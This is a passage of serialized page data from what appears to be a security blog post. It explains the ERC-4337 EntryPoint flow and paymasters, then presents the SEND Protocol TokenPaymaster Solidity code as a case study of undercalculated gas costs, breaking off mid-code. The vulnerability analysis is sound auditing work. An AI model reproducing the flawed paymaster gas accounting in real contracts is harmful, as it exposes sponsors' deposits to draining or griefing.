ERC‑20 tokens or via sponsor (gasless UX)",{"type":25,"tag":2043,"props":106099,"children":106100},{},[106101],{"type":31,"value":106102},"Using custom signature schemes or multisig logic",{"type":25,"tag":2043,"props":106104,"children":106105},{},[106106],{"type":31,"value":106107},"Creation and use of smart contract wallets without needing ETH or seed phrase upfront",{"type":25,"tag":26,"props":106109,"children":106111},{"id":106110},"how-erc-4337-works",[106112],{"type":31,"value":106113},"How ERC-4337 Works",{"type":25,"tag":38,"props":106115,"children":106116},{},[106117],{"type":31,"value":106118},"Before diving into each component, let's look at how ERC-4337 works at a high level:",{"type":25,"tag":38,"props":106120,"children":106121},{},[106122],{"type":25,"tag":6467,"props":106123,"children":106125},{"alt":54547,"src":106124},"/posts/paymasters-evm/flowchart.png",[],{"type":25,"tag":38,"props":106127,"children":106128},{},[106129],{"type":31,"value":106130},"The diagram above shows the key flow of ERC-4337. Below is a short explanation of each component shown above.",{"type":25,"tag":606,"props":106132,"children":106134},{"id":106133},"useroperation",[106135],{"type":25,"tag":82,"props":106136,"children":106138},{"className":106137},[],[106139],{"type":31,"value":106140},"UserOperation",{"type":25,"tag":38,"props":106142,"children":106143},{},[106144],{"type":31,"value":106145},"A UserOperation is a pseudo‑transaction object representing the user’s intent. It includes data like:",{"type":25,"tag":2039,"props":106147,"children":106148},{},[106149,106154,106159],{"type":25,"tag":2043,"props":106150,"children":106151},{},[106152],{"type":31,"value":106153},"Target contract call(s)",{"type":25,"tag":2043,"props":106155,"children":106156},{},[106157],{"type":31,"value":106158},"Signature or validation metadata",{"type":25,"tag":2043,"props":106160,"children":106161},{},[106162,106164,106170],{"type":31,"value":106163},"Gas limits and fee payment details (wallet address, paymaster, bundler)\n",{"type":25,"tag":82,"props":106165,"children":106167},{"className":106166},[],[106168],{"type":31,"value":106169},"UserOperations",{"type":31,"value":106171}," are submitted to a separate mempool (often called alt‑mempool), not the regular Ethereum transaction pool.",{"type":25,"tag":606,"props":106173,"children":106175},{"id":106174},"smart-contract-account",[106176],{"type":31,"value":106177},"Smart Contract Account",{"type":25,"tag":38,"props":106179,"children":106180},{},[106181,106183,106189,106190,106196],{"type":31,"value":106182},"Often called Sender or Smart Account, this is a user-controlled contract implementing logic via ",{"type":25,"tag":82,"props":106184,"children":106186},{"className":106185},[],[106187],{"type":31,"value":106188},"validateUserOp()",{"type":31,"value":1307},{"type":25,"tag":82,"props":106191,"children":106193},{"className":106192},[],[106194],{"type":31,"value":106195},"executeUserOp()",{"type":31,"value":106197},". It specifies custom rules: signature checking, nonce logic, allowed calls, or spending limits.",{"type":25,"tag":606,"props":106199,"children":106201},{"id":106200},"bundler",[106202],{"type":31,"value":106203},"Bundler",{"type":25,"tag":38,"props":106205,"children":106206},{},[106207,106209,106214,106216,106222],{"type":31,"value":106208},"A Bundler is an off‑chain service or node monitoring the alt‑mempool. It collects multiple ",{"type":25,"tag":82,"props":106210,"children":106212},{"className":106211},[],[106213],{"type":31,"value":106169},{"type":31,"value":106215},", packages them, and submits them in a single transaction to the ",{"type":25,"tag":82,"props":106217,"children":106219},{"className":106218},[],[106220],{"type":31,"value":106221},"EntryPoint",{"type":31,"value":106223}," contract. Bundlers must use an EOA to pay gas upfront and are later reimbursed.",{"type":25,"tag":606,"props":106225,"children":106226},{"id":18680},[106227],{"type":25,"tag":82,"props":106228,"children":106230},{"className":106229},[],[106231],{"type":31,"value":106221},{"type":25,"tag":38,"props":106233,"children":106234},{},[106235,106236,106241,106243,106248,106250,106254,106256,106261],{"type":31,"value":474},{"type":25,"tag":82,"props":106237,"children":106239},{"className":106238},[],[106240],{"type":31,"value":106221},{"type":31,"value":106242}," contract acts as the central on-chain gateway for ERC-4337. For every batch of ",{"type":25,"tag":82,"props":106244,"children":106246},{"className":106245},[],[106247],{"type":31,"value":106169},{"type":31,"value":106249}," submitted by a ",{"type":25,"tag":9273,"props":106251,"children":106252},{},[106253],{"type":31,"value":106203},{"type":31,"value":106255},", the ",{"type":25,"tag":82,"props":106257,"children":106259},{"className":106258},[],[106260],{"type":31,"value":106221},{"type":31,"value":106262}," validates and routes each operation back to the corresponding Smart Contract Wallet for execution.",{"type":25,"tag":38,"props":106264,"children":106265},{},[106266,106268,106273,106275,106279,106281,106286,106288,106294],{"type":31,"value":106267},"Once all operations have been processed, the ",{"type":25,"tag":82,"props":106269,"children":106271},{"className":106270},[],[106272],{"type":31,"value":106221},{"type":31,"value":106274}," calculates the total gas consumed and reimburses the ",{"type":25,"tag":9273,"props":106276,"children":106277},{},[106278],{"type":31,"value":106203},{"type":31,"value":106280},". This payment can come either directly from the sender's Smart Account deposit in the ",{"type":25,"tag":82,"props":106282,"children":106284},{"className":106283},[],[106285],{"type":31,"value":106221},{"type":31,"value":106287}," or from a ",{"type":25,"tag":82,"props":106289,"children":106291},{"className":106290},[],[106292],{"type":31,"value":106293},"paymaster",{"type":31,"value":106295}," that has agreed to sponsor the transaction.",{"type":25,"tag":606,"props":106297,"children":106298},{"id":106293},[106299],{"type":25,"tag":82,"props":106300,"children":106302},{"className":106301},[],[106303],{"type":31,"value":106304},"Paymaster",{"type":25,"tag":38,"props":106306,"children":106307},{},[106308,106310,106315],{"type":31,"value":106309},"A ",{"type":25,"tag":82,"props":106311,"children":106313},{"className":106312},[],[106314],{"type":31,"value":106293},{"type":31,"value":106316}," is an optional smart contract that enables flexible gas payment options. It can either sponsor gas fees directly or allow users to pay gas using ERC-20 tokens instead of ETH. It runs two key functions:",{"type":25,"tag":2039,"props":106318,"children":106319},{},[106320,106331],{"type":25,"tag":2043,"props":106321,"children":106322},{},[106323,106329],{"type":25,"tag":82,"props":106324,"children":106326},{"className":106325},[],[106327],{"type":31,"value":106328},"validatePaymasterUserOp()",{"type":31,"value":106330}," to validate the operation. This can check sponsorship eligibility or verify that the user has sufficient ERC-20 token balance and allowance to cover gas costs. The exact implementation of the function depends on how the protocol implements it.",{"type":25,"tag":2043,"props":106332,"children":106333},{},[106334,106340],{"type":25,"tag":82,"props":106335,"children":106337},{"className":106336},[],[106338],{"type":31,"value":106339},"postOp()",{"type":31,"value":106341},", which handles post-execution accounting. For sponsored transactions, this may update internal accounting records, while for token payments, it typically finalizes any accounting related to the ERC-20 token payment.",{"type":25,"tag":38,"props":106343,"children":106344},{},[106345,106347,106352],{"type":31,"value":106346},"By supporting both sponsorship and token-based gas payments, ",{"type":25,"tag":82,"props":106348,"children":106350},{"className":106349},[],[106351],{"type":31,"value":106293},{"type":31,"value":106353}," removes the requirement for users to hold ETH, enabling truly gasless transactions through either model.",{"type":25,"tag":26,"props":106355,"children":106357},{"id":106356},"understanding-the-entrypoints-flow",[106358,106360,106365],{"type":31,"value":106359},"Understanding the ",{"type":25,"tag":82,"props":106361,"children":106363},{"className":106362},[],[106364],{"type":31,"value":106221},{"type":31,"value":106366},"'s Flow",{"type":25,"tag":38,"props":106368,"children":106369},{},[106370,106372,106377,106378,106383,106385,106396,106398,106403,106404,106409],{"type":31,"value":106371},"When a bundler submits ",{"type":25,"tag":82,"props":106373,"children":106375},{"className":106374},[],[106376],{"type":31,"value":106169},{"type":31,"value":20370},{"type":25,"tag":82,"props":106379,"children":106381},{"className":106380},[],[106382],{"type":31,"value":106221},{"type":31,"value":106384}," contract via ",{"type":25,"tag":162,"props":106386,"children":106389},{"href":106387,"rel":106388},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L58",[166],[106390],{"type":25,"tag":82,"props":106391,"children":106393},{"className":106392},[],[106394],{"type":31,"value":106395},"handleOps()",{"type":31,"value":106397},", the processing occurs in two main phases: ",{"type":25,"tag":9273,"props":106399,"children":106400},{},[106401],{"type":31,"value":106402},"Validation",{"type":31,"value":1307},{"type":25,"tag":9273,"props":106405,"children":106406},{},[106407],{"type":31,"value":106408},"Execution",{"type":31,"value":179},{"type":25,"tag":606,"props":106411,"children":106413},{"id":106412},"validation-phase",[106414],{"type":31,"value":106415},"Validation Phase",{"type":25,"tag":38,"props":106417,"children":106418},{},[106419,106421,106426,106428,106434,106436,106442,106443,106448],{"type":31,"value":106420},"In this phase, the ",{"type":25,"tag":82,"props":106422,"children":106424},{"className":106423},[],[106425],{"type":31,"value":106221},{"type":31,"value":106427}," first validates all operations in the submitted ",{"type":25,"tag":82,"props":106429,"children":106431},{"className":106430},[],[106432],{"type":31,"value":106433},"UserOps",{"type":31,"value":106435}," array before executing any of them. This ensures that only valid operations proceed to execution. For each ",{"type":25,"tag":82,"props":106437,"children":106439},{"className":106438},[],[106440],{"type":31,"value":106441},"UserOp",{"type":31,"value":106255},{"type":25,"tag":82,"props":106444,"children":106446},{"className":106445},[],[106447],{"type":31,"value":106221},{"type":31,"value":1472},{"type":25,"tag":6711,"props":106450,"children":106451},{},[106452,106470,106488,106509,106521],{"type":25,"tag":2043,"props":106453,"children":106454},{},[106455,106462,106464],{"type":25,"tag":162,"props":106456,"children":106459},{"href":106457,"rel":106458},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L764-L777",[166],[106460],{"type":31,"value":106461},"Calculates",{"type":31,"value":106463}," the required prefund amount by summing up all specified gas limits (verification, execution, and paymaster if used) multiplied by the user's specified ",{"type":25,"tag":82,"props":106465,"children":106467},{"className":106466},[],[106468],{"type":31,"value":106469},"maxFeePerGas",{"type":25,"tag":2043,"props":106471,"children":106472},{},[106473,106480,106481,106486],{"type":25,"tag":162,"props":106474,"children":106477},{"href":106475,"rel":106476},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L545-L553",[166],[106478],{"type":31,"value":106479},"Calls",{"type":31,"value":10409},{"type":25,"tag":82,"props":106482,"children":106484},{"className":106483},[],[106485],{"type":31,"value":106188},{"type":31,"value":106487}," on the sender's smart account contract to verify the operation's validity (e.g. checking signatures)",{"type":25,"tag":2043,"props":106489,"children":106490},{},[106491,106493,106500,106502,106507],{"type":31,"value":106492},"If no paymaster is specified, attempts to ",{"type":25,"tag":162,"props":106494,"children":106497},{"href":106495,"rel":106496},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L554-L557",[166],[106498],{"type":31,"value":106499},"deduct",{"type":31,"value":106501}," the prefund amount from the sender's ETH deposit in the ",{"type":25,"tag":82,"props":106503,"children":106505},{"className":106504},[],[106506],{"type":31,"value":106221},{"type":31,"value":106508}," (this can be partially refunded later if actual execution costs less)",{"type":25,"tag":2043,"props":106510,"children":106511},{},[106512,106519],{"type":25,"tag":162,"props":106513,"children":106516},{"href":106514,"rel":106515},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L785-L788",[166],[106517],{"type":31,"value":106518},"Validates",{"type":31,"value":106520}," the nonce to prevent replay attacks",{"type":25,"tag":2043,"props":106522,"children":106523},{},[106524,106526,106532,106534,106540,106541,106546],{"type":31,"value":106525},"If a paymaster is specified, it will ",{"type":25,"tag":162,"props":106527,"children":106530},{"href":106528,"rel":106529},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L623-L627",[166],[106531],{"type":31,"value":106499},{"type":31,"value":106533}," the required prefund amount from the paymaster's deposited ETH and then ",{"type":25,"tag":162,"props":106535,"children":106538},{"href":106536,"rel":106537},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L629",[166],[106539],{"type":31,"value":42259},{"type":31,"value":10409},{"type":25,"tag":82,"props":106542,"children":106544},{"className":106543},[],[106545],{"type":31,"value":106328},{"type":31,"value":106547}," on the paymaster contract to verify it will cover gas costs",{"type":25,"tag":38,"props":106549,"children":106550},{},[106551,106553,106558,106560,106565],{"type":31,"value":106552},"Only after all these validation checks pass will the ",{"type":25,"tag":82,"props":106554,"children":106556},{"className":106555},[],[106557],{"type":31,"value":106221},{"type":31,"value":106559}," move on to actually executing the ",{"type":25,"tag":82,"props":106561,"children":106563},{"className":106562},[],[106564],{"type":31,"value":106140},{"type":31,"value":106566},". This strict validation flow ensures that:",{"type":25,"tag":2039,"props":106568,"children":106569},{},[106570,106575,106580,106585],{"type":25,"tag":2043,"props":106571,"children":106572},{},[106573],{"type":31,"value":106574},"The operation is legitimate and authorized by the user",{"type":25,"tag":2043,"props":106576,"children":106577},{},[106578],{"type":31,"value":106579},"Sufficient funds are available to cover gas (either from user or paymaster)",{"type":25,"tag":2043,"props":106581,"children":106582},{},[106583],{"type":31,"value":106584},"The operation cannot be replayed",{"type":25,"tag":2043,"props":106586,"children":106587},{},[106588],{"type":31,"value":106589},"All involved contracts (sender and paymaster) have approved the execution",{"type":25,"tag":38,"props":106591,"children":106592},{},[106593],{"type":31,"value":106594},"This multi-layered validation approach is crucial for maintaining security when processing operations that can involve complex smart account logic and third-party gas sponsorship.",{"type":25,"tag":606,"props":106596,"children":106598},{"id":106597},"execution-phase",[106599],{"type":31,"value":106600},"Execution Phase",{"type":25,"tag":38,"props":106602,"children":106603},{},[106604,106606,106611,106613,106620,106622,106627],{"type":31,"value":106605},"After all operations have passed validation, the ",{"type":25,"tag":82,"props":106607,"children":106609},{"className":106608},[],[106610],{"type":31,"value":106221},{"type":31,"value":106612}," begins the ",{"type":25,"tag":162,"props":106614,"children":106617},{"href":106615,"rel":106616},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L70-L72",[166],[106618],{"type":31,"value":106619},"execution",{"type":31,"value":106621}," phase, processing each ",{"type":25,"tag":82,"props":106623,"children":106625},{"className":106624},[],[106626],{"type":31,"value":106140},{"type":31,"value":106628}," individually. For each operation, the flow is:",{"type":25,"tag":6711,"props":106630,"children":106631},{},[106632,106692,106738],{"type":25,"tag":2043,"props":106633,"children":106634},{},[106635,106636,106641,106643,106649,106650,106656,106658],{"type":31,"value":474},{"type":25,"tag":82,"props":106637,"children":106639},{"className":106638},[],[106640],{"type":31,"value":106221},{"type":31,"value":106642}," makes a ",{"type":25,"tag":162,"props":106644,"children":106647},{"href":106645,"rel":106646},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L213-L232",[166],[106648],{"type":31,"value":42259},{"type":31,"value":60744},{"type":25,"tag":82,"props":106651,"children":106653},{"className":106652},[],[106654],{"type":31,"value":106655},"innerHandleOp()",{"type":31,"value":106657},", which:\n",{"type":25,"tag":2039,"props":106659,"children":106660},{},[106661,106673,106678],{"type":25,"tag":2043,"props":106662,"children":106663},{},[106664,106671],{"type":25,"tag":162,"props":106665,"children":106668},{"href":106666,"rel":106667},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L403",[166],[106669],{"type":31,"value":106670},"Forwards",{"type":31,"value":106672}," the operation to the sender's smart account contract",{"type":25,"tag":2043,"props":106674,"children":106675},{},[106676],{"type":31,"value":106677},"Executes the intended transaction(s) within the smart account",{"type":25,"tag":2043,"props":106679,"children":106680},{},[106681,106683,106690],{"type":31,"value":106682},"Handles ",{"type":25,"tag":162,"props":106684,"children":106687},{"href":106685,"rel":106686},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L821",[166],[106688],{"type":31,"value":106689},"post-execution",{"type":31,"value":106691}," tasks and cleanup",{"type":25,"tag":2043,"props":106693,"children":106694},{},[106695,106697,106703,106705,106711,106712,106718,106720],{"type":31,"value":106696},"If a paymaster was used, ",{"type":25,"tag":82,"props":106698,"children":106700},{"className":106699},[],[106701],{"type":31,"value":106702},"Entrypoint",{"type":31,"value":106704}," will ",{"type":25,"tag":162,"props":106706,"children":106709},{"href":106707,"rel":106708},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L848-L857",[166],[106710],{"type":31,"value":42259},{"type":31,"value":10409},{"type":25,"tag":82,"props":106713,"children":106715},{"className":106714},[],[106716],{"type":31,"value":106717},"paymaster.postOp()",{"type":31,"value":106719}," to:\n",{"type":25,"tag":2039,"props":106721,"children":106722},{},[106723,106728,106733],{"type":25,"tag":2043,"props":106724,"children":106725},{},[106726],{"type":31,"value":106727},"Allow paymaster to finalize its accounting",{"type":25,"tag":2043,"props":106729,"children":106730},{},[106731],{"type":31,"value":106732},"Process any refunds or additional charges",{"type":25,"tag":2043,"props":106734,"children":106735},{},[106736],{"type":31,"value":106737},"Complete any paymaster-specific logic",{"type":25,"tag":2043,"props":106739,"children":106740},{},[106741,106743,106748,106749,106756,106758],{"type":31,"value":106742},"Finally, after all operations are processed, the ",{"type":25,"tag":82,"props":106744,"children":106746},{"className":106745},[],[106747],{"type":31,"value":106221},{"type":31,"value":10409},{"type":25,"tag":162,"props":106750,"children":106753},{"href":106751,"rel":106752},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L74",[166],[106754],{"type":31,"value":106755},"compensates",{"type":31,"value":106757}," the bundler for:\n",{"type":25,"tag":2039,"props":106759,"children":106760},{},[106761,106766,106771],{"type":25,"tag":2043,"props":106762,"children":106763},{},[106764],{"type":31,"value":106765},"Gas costs from executing all operations",{"type":25,"tag":2043,"props":106767,"children":106768},{},[106769],{"type":31,"value":106770},"Overhead from submitting the batch transaction",{"type":25,"tag":2043,"props":106772,"children":106773},{},[106774],{"type":31,"value":106775},"Any unused gas, which is refunded",{"type":25,"tag":38,"props":106777,"children":106778},{},[106779],{"type":31,"value":106780},"This execution flow ensures secure and atomic operation execution, accurate tracking and settlement of gas costs, support for custom paymaster payment logic, and proper compensation for bundlers who provide the transaction submission service.",{"type":25,"tag":38,"props":106782,"children":106783},{},[106784,106786,106791,106793,106799,106801,106806],{"type":31,"value":106785},"Now that we understand how the ",{"type":25,"tag":82,"props":106787,"children":106789},{"className":106788},[],[106790],{"type":31,"value":106221},{"type":31,"value":106792}," works at a high level, let's examine how some protocols have failed to properly implement ",{"type":25,"tag":82,"props":106794,"children":106796},{"className":106795},[],[106797],{"type":31,"value":106798},"paymasters",{"type":31,"value":106800}," that align with the ",{"type":25,"tag":82,"props":106802,"children":106804},{"className":106803},[],[106805],{"type":31,"value":106221},{"type":31,"value":106807},"'s execution model, leading to potential vulnerabilities.",{"type":25,"tag":453,"props":106809,"children":106811},{"id":106810},"common-pitfalls-in-paymaster-implementation",[106812],{"type":31,"value":106813},"Common Pitfalls in Paymaster Implementation",{"type":25,"tag":38,"props":106815,"children":106816},{},[106817,106819,106824],{"type":31,"value":106818},"While paymasters offer powerful flexibility, they also introduce new complexity, and with it, room for subtle bugs. Missteps in paymaster design can not only break gas sponsorship flows, but also expose their deposited ETH in the ",{"type":25,"tag":82,"props":106820,"children":106822},{"className":106821},[],[106823],{"type":31,"value":106221},{"type":31,"value":106825}," to exploitation or griefing.",{"type":25,"tag":38,"props":106827,"children":106828},{},[106829,106831,106836],{"type":31,"value":106830},"In this section, we’ll walk through the ",{"type":25,"tag":9273,"props":106832,"children":106833},{},[106834],{"type":31,"value":106835},"two most common pitfalls",{"type":31,"value":106837}," we’ve observed in real-world paymaster implementations:",{"type":25,"tag":26,"props":106839,"children":106841},{"id":106840},"undercalculated-gas-costs",[106842],{"type":25,"tag":9273,"props":106843,"children":106844},{},[106845],{"type":31,"value":106846},"Undercalculated Gas Costs",{"type":25,"tag":38,"props":106848,"children":106849},{},[106850,106852,106857,106859,106864,106866,106871,106873,106880],{"type":31,"value":106851},"To understand this issue, let's first examine how gas penalties work in the ",{"type":25,"tag":82,"props":106853,"children":106855},{"className":106854},[],[106856],{"type":31,"value":106221},{"type":31,"value":106858},". When a ",{"type":25,"tag":82,"props":106860,"children":106862},{"className":106861},[],[106863],{"type":31,"value":106140},{"type":31,"value":106865}," specifies an execution gas limit higher than what's actually used during execution, the ",{"type":25,"tag":82,"props":106867,"children":106869},{"className":106868},[],[106870],{"type":31,"value":106221},{"type":31,"value":106872}," charges a ",{"type":25,"tag":162,"props":106874,"children":106877},{"href":106875,"rel":106876},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.7/contracts/core/EntryPoint.sol#L718-L728",[166],[106878],{"type":31,"value":106879},"penalty of 10%",{"type":31,"value":106881}," of the unused gas. This penalty is paid to the bundler and is deducted from either the user's deposit (for regular transactions) or the paymaster's deposit (when using a paymaster).",{"type":25,"tag":38,"props":106883,"children":106884},{},[106885],{"type":31,"value":106886},"Now, let's examine a real-world example of how this penalty mechanism could impact paymasters. The SEND Protocol's paymaster implementation provides an instructive case study:",{"type":25,"tag":206,"props":106888,"children":106890},{"className":8423,"code":106889,"language":8422,"meta":7,"style":7},"contract TokenPaymaster is BasePaymaster, UniswapHelper, OracleHelper {\n[...]\n    function _validatePaymasterUserOp(PackedUserOperation calldata userOp, bytes32, uint256 requiredPreFund)\n        internal\n        override\n        returns (bytes memory context, uint256 validationResult)\n    {\n        unchecked {\n            uint256 priceMarkup = tokenPaymasterConfig.priceMarkup;\n            uint256 baseFee = tokenPaymasterConfig.baseFee;\n            uint256 dataLength = userOp.paymasterAndData.length - PAYMASTER_DATA_OFFSET;\n            require(dataLength == 0 || dataLength == 32, \"TPM: invalid data length\");\n            uint256 maxFeePerGas = userOp.unpackMaxFeePerGas();\n            uint256 refundPostopCost = tokenPaymasterConfig.refundPostopCost;\n            require(refundPostopCost \u003C userOp.unpackPostOpGasLimit(), \"TPM: postOpGasLimit too low\");\n            uint256 preChargeNative = requiredPreFund + (refundPostopCost * maxFeePerGas);\n            // note: price is in native-asset-per-token increasing it means dividing it by markup\n            uint256 cachedPriceWithMarkup = cachedPrice * DENOM / priceMarkup;\n            if (dataLength == 32) {\n                uint256 clientSuppliedPrice =\n                    uint256(bytes32(userOp.paymasterAndData[PAYMASTER_DATA_OFFSET:PAYMASTER_DATA_OFFSET + 32]));\n                if (clientSuppliedPrice \u003C cachedPriceWithMarkup) {\n                    // note: smaller number means 'more native asset per token'\n                    cachedPriceWithMarkup = clientSuppliedPrice;\n                }\n            }\n            uint256 tokenAmount = weiToToken(preChargeNative, cachedPriceWithMarkup);\n            tokenAmount += baseFee;\n            SafeERC20.safeTransferFrom(token, userOp.sender, address(this), tokenAmount);\n            context = abi.encode(tokenAmount, userOp.sender);\n            validationResult =\n                _packValidationData(false, uint48(cachedPriceTimestamp + tokenPaymasterConfig.priceMaxAge), 0);\n        }\n    }\n[...]\n    function _postOp(PostOpMode, bytes calldata context, uint256 actualGasCost, uint256 actualUserOpFeePerGas)\n        internal\n        override\n    {\n        unchecked {\n            uint256 priceMarkup = tokenPaymasterConfig.priceMarkup;\n            uint256 baseFee = tokenPaymasterConfig.baseFee;\n            (uint256 preCharge, address userOpSender) = abi.decode(context, (uint256, address));\n            preCharge -= baseFee; // don't refund the base fee\n            uint256 _cachedPrice = updateCachedPrice(false);\n            // note: price is in native-asset-per-token increasing it means dividing it by markup\n            uint256 cachedPriceWithMarkup = _cachedPrice * DENOM / priceMarkup;\n            // Refund tokens based on actual gas cost\n            uint256 actualChargeNative = actualGasCost + tokenPaymasterConfig.refundPostopCost * actualUserOpFeePerGas;\n            uint256 actualTokenNeeded = weiToToken(actualChargeNative, cachedPriceWithMarkup);\n            if (preCharge > actualTokenNeeded) {\n                // If initially provided token amount is greater than the actual amount needed, refund the difference\n                SafeERC20.safeTransfer(token, userOpSender, preCharge - actualTokenNeeded);\n            } else if (preCharge \u003C actualTokenNeeded) {\n                // Attempt to cover Paymaster's gas expenses by withdrawing the 'overdraft' from the client\n                // If the transfer reverts also revert the 'postOp' to remove the incentive to cheat\n                SafeERC20.safeTransferFrom(token, userOpSender, address(this), actualTokenNeeded - preCharge);\n            }\n\n            if (baseFee > 0) {\n                SafeERC20.safeTransfer(token, tokenPaymasterConfig.rewardsPool, baseFee);\n            }\n\n            emit UserOperationSponsored(userOpSender, actualTokenNeeded, actualGasCost, cachedPriceWithMarkup, baseFee);\n            refillEntryPointDeposit(_cachedPrice);\n        }\n    }\n}\n",[106891],{"type":25,"tag":82,"props":106892,"children":106893},{"__ignoreMap":7},[106894,106938,106945,107002,107010,107018,107060,107067,107079,107101,107122,107152,107203,107233,107254,107292,107331,107348,107387,107411,107428,107471,107493,107510,107527,107534,107541,107567,107584,107619,107650,107662,107709,107716,107723,107730,107797,107804,107811,107818,107829,107848,107867,107931,107954,107987,108002,108037,108045,108084,108109,108130,108138,108165,108192,108200,108208,108250,108257,108264,108288,108304,108311,108318,108336,108349,108356,108364],{"type":25,"tag":216,"props":106895,"children":106896},{"class":6922,"line":6923},[106897,106901,106906,106911,106916,106920,106925,106929,106934],{"type":25,"tag":216,"props":106898,"children":106899},{"style":6936},[106900],{"type":31,"value":93785},{"type":25,"tag":216,"props":106902,"children":106903},{"style":7375},[106904],{"type":31,"value":106905}," TokenPaymaster",{"type":25,"tag":216,"props":106907,"children":106908},{"style":6936},[106909],{"type":31,"value":106910}," is",{"type":25,"tag":216,"props":106912,"children":106913},{"style":7375},[106914],{"type":31,"value":106915}," BasePaymaster",{"type":25,"tag":216,"props":106917,"children":106918},{"style":6964},[106919],{"type":31,"value":7026},{"type":25,"tag":216,"props":106921,"children":106922},{"style":7375},[106923],{"type":31,"value":106924},"UniswapHelper",{"type":25,"tag":216,"props":106926,"children":106927},{"style":6964},[106928],{"type":31,"value":7026},{"type":25,"tag":216,"props":106930,"children":106931},{"style":7375},[106932],{"type":31,"value":106933},"OracleHelper",{"type":25,"tag":216,"props":106935,"children":106936},{"style":6964},[106937],{"type":31,"value":7241},{"type":25,"tag":216,"props":106939,"children":106940},{"class":6922,"line":6769},[106941],{"type":25,"tag":216,"props":106942,"children":106943},{"style":6964},[106944],{"type":31,"value":14275},{"type":25,"tag":216,"props":106946,"children":106947},{"class":6922,"line":6778},[106948,106952,106957,106961,106966,106971,106976,106980,106985,106989,106993,106998],{"type":25,"tag":216,"props":106949,"children":106950},{"style":6936},[106951],{"type":31,"value":93802},{"type":25,"tag":216,"props":106953,"children":106954},{"style":7047},[106955],{"type":31,"value":106956}," _validatePaymasterUserOp",{"type":25,"tag":216,"props":106958,"children":106959},{"style":6964},[106960],{"type":31,"value":1850},{"type":25,"tag":216,"props":106962,"children":106963},{"style":6936},[106964],{"type":31,"value":106965},"PackedUserOperation",{"type":25,"tag":216,"props":106967,"children":106968},{"style":6936},[106969],{"type":31,"value":106970}," calldata",{"type":25,"tag":216,"props":106972,"children":106973},{"style":6947},[106974],{"type":31,"value":106975}," userOp",{"type":25,"tag":216,"props":106977,"children":106978},{"style":6964},[106979],{"type":31,"value":7026},{"type":25,"tag":216,"props":106981,"children":106982},{"style":7375},[106983],{"type":31,"value":106984},"bytes32",{"type":25,"tag":216,"props":106986,"children":106987},{"style":6964},[106988],{"type":31,"value":7026},{"type":25,"tag":216,"props":106990,"children":106991},{"style":7375},[106992],{"type":31,"value":50136},{"type":25,"tag":216,"props":106994,"children":106995},{"style":6947},[106996],{"type":31,"value":106997}," requiredPreFund",{"type":25,"tag":216,"props":106999,"children":107000},{"style":6964},[107001],{"type":31,"value":7107},{"type":25,"tag":216,"props":107003,"children":107004},{"class":6922,"line":7005},[107005],{"type":25,"tag":216,"props":107006,"children":107007},{"style":6936},[107008],{"type":31,"value":107009},"        internal\n",{"type":25,"tag":216,"props":107011,"children":107012},{"class":6922,"line":7110},[107013],{"type":25,"tag":216,"props":107014,"children":107015},{"style":6936},[107016],{"type":31,"value":107017},"        override\n",{"type":25,"tag":216,"props":107019,"children":107020},{"class":6922,"line":7216},[107021,107026,107030,107034,107039,107043,107047,107051,107056],{"type":25,"tag":216,"props":107022,"children":107023},{"style":6973},[107024],{"type":31,"value":107025},"        returns",{"type":25,"tag":216,"props":107027,"children":107028},{"style":6964},[107029],{"type":31,"value":7016},{"type":25,"tag":216,"props":107031,"children":107032},{"style":7375},[107033],{"type":31,"value":87800},{"type":25,"tag":216,"props":107035,"children":107036},{"style":6936},[107037],{"type":31,"value":107038}," memory",{"type":25,"tag":216,"props":107040,"children":107041},{"style":6947},[107042],{"type":31,"value":80312},{"type":25,"tag":216,"props":107044,"children":107045},{"style":6964},[107046],{"type":31,"value":7026},{"type":25,"tag":216,"props":107048,"children":107049},{"style":7375},[107050],{"type":31,"value":50136},{"type":25,"tag":216,"props":107052,"children":107053},{"style":6947},[107054],{"type":31,"value":107055}," validationResult",{"type":25,"tag":216,"props":107057,"children":107058},{"style":6964},[107059],{"type":31,"value":7107},{"type":25,"tag":216,"props":107061,"children":107062},{"class":6922,"line":7244},[107063],{"type":25,"tag":216,"props":107064,"children":107065},{"style":6964},[107066],{"type":31,"value":33147},{"type":25,"tag":216,"props":107068,"children":107069},{"class":6922,"line":7257},[107070,107075],{"type":25,"tag":216,"props":107071,"children":107072},{"style":6973},[107073],{"type":31,"value":107074},"        unchecked",{"type":25,"tag":216,"props":107076,"children":107077},{"style":6964},[107078],{"type":31,"value":7241},{"type":25,"tag":216,"props":107080,"children":107081},{"class":6922,"line":7275},[107082,107087,107092,107096],{"type":25,"tag":216,"props":107083,"children":107084},{"style":7375},[107085],{"type":31,"value":107086},"            uint256",{"type":25,"tag":216,"props":107088,"children":107089},{"style":6964},[107090],{"type":31,"value":107091}," priceMarkup ",{"type":25,"tag":216,"props":107093,"children":107094},{"style":6953},[107095],{"type":31,"value":266},{"type":25,"tag":216,"props":107097,"children":107098},{"style":6964},[107099],{"type":31,"value":107100}," tokenPaymasterConfig.priceMarkup;\n",{"type":25,"tag":216,"props":107102,"children":107103},{"class":6922,"line":7296},[107104,107108,107113,107117],{"type":25,"tag":216,"props":107105,"children":107106},{"style":7375},[107107],{"type":31,"value":107086},{"type":25,"tag":216,"props":107109,"children":107110},{"style":6964},[107111],{"type":31,"value":107112}," baseFee 